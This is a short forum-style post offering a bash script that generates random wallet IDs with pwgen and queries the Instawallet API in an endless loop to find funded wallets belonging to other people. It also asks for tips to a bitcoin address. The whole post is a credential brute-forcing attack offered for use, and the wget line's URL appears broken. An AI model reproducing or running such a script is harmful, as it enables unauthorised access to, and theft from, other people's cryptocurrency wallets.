Here is a script that will generate potential wallet ID's and run them against the instawallet API :) Most of your results will look like this... h31JB5T3ib47A8zDppauSHUnHUhVUoPLL = {"successful":false,"message":"The API is currently unavailable.","message_code":1} It simply means the wallet hasn't been created yet so there cant' be anything in it anyways. If it exists, it will return the value of the wallet. All tips go to 1HQnXb8jaQKzx9PPYFSv7HUBkvNe5ENfjS Make sure you have pwgen installed! Thanks :) #!/bin/bash while :; do wallet=`pwgen -1 -n 33 -s`; balance=`wget -q -O /dev/stdout$wallet/balance`; echo "$wallet = $balance"; done